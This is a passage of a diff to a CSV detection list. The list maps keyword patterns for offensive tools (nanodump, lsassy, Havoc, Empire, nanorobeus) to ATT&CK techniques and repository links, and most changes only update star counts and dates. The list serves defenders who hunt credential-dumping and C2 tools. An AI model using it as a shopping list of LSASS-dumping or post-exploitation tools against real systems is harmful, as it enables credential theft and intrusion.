utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nanodump *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump -*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*nanodump.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*nanodump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump.git*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump.x64.exe*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*nanodump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*nanodump_pipe*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*nanodump_ppl.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*nanodump_ppl.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*nanodump_ppl_dump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_dump.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_dump.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump_ssp*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*nanodump_ssp*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*nanodump_ssp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump_ssp.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*nanodump_ssp.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*nanodump_ssp.x64.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*nanodump_ssp_embedded.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*NanoDumpChoose*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*nanodump_ssp_embedded.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*NanoDumpChoose*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*nanodump-pipes*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*NanoDumpWriteDump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*nanorobeus*_cs.x64.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus*_cs.x86.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus*dump*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus.cna*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*nanorobeus.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*nanorobeus.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*nanorobeus.x64*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*nanorobeus.x64.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*nanorobeus.x64.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*nanorobeus.x86*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus_brc4*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus64*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus86*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*nanorobeus-main*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*nanorubeus.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Narasimha1997/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*nanorubeus.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Narasimha1997/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*NativeEasyHook32.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*NativeEasyHook64.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*Naughty-Script.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*NBNSBruteForceHost*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*NBNSBruteForcePause*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*NBNSBruteForceSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*NBNSBruteForceTarget*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*nbnsspoof.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*NBNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Naughty-Script.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*NBNSBruteForceHost*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public 